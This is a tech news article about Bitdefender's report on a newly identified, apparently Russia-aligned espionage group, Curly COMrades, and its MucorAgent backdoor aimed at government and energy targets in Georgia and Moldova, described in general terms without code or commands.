Experts warn criminals are using backdoor malware to target governments

News
By published

CurlyCOMrades are targeting Moldova and Georgia

Computer Hacked, System Error, Virus, Cyber attack, Malware Concept. Danger Symbol
(Image credit: Shutterstock)
  • Bitdefender finds new piece of malware in the wild
  • It attributed it to a brand-new cyber-espionage group
  • The researchers believe the group is Russian

Cybersecurity researchers at Bitdefender recently spotted a new threat actor using a never-before-seen piece of backdoor malware to target critical infrastructure organizations in eastern Europe.

Bitdefender named the new group Curly COMrades, since it heavily relies on the curl.exe tool to pull data and communicate with the C2 server, and since it hijacks Component Object Model (COM) objects during its attacks.

In its attacks, Curly COMrades deploy a backdoor named MucorAgent, a custom three-stage malware component, “engineered as a .NET stealthy tool capable of executing an AES-encrypted PowerShell script and uploading the resulting output to a designated server.”

When in doubt - blame the Russians

In other words, it’s a piece of Windows malware that runs hidden commands, keeps them encrypted to avoid detection, and sends the results back to the attacker.

So far, identified victims include government and judicial organizations in Georgia, and energy companies in Moldova.

Given the targets, the researchers believe the attackers are of Russian origin, or at least Russia-aligned.

However, they did stress that there are no strong overlaps with known Russian APT groups, but Curly COMrades’ operations “align with the geopolitical goals of the Russian Federation."

Bitdefender also could not determine the initial access vector - how crooks managed to infiltrate the target endpoints to deploy MucorAgent to begin with.

They claim to have seen installations of multiple proxy agents, including Resocks which, they suspect, may have been used to that end.

Ever since Russia’s attention turned towards Ukraine in 2014 with the annexation of Crimea, countries on its eastern border have lost the spotlight. Georgia, however, is in a similar position to Ukraine, with two regions declaring independence with the help of the Russian military - South Ossetia, and Abkhazia. Therefore, it would make sense that Russia’s cyberspies would like to keep tabs on neighboring countries and their diplomatic efforts.

Via BleepingComputer

You might also like

TOPICS
Sead Fadilpašić

Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.

You must confirm your public display name before commenting

Please logout and then login again, you will then be prompted to enter your display name.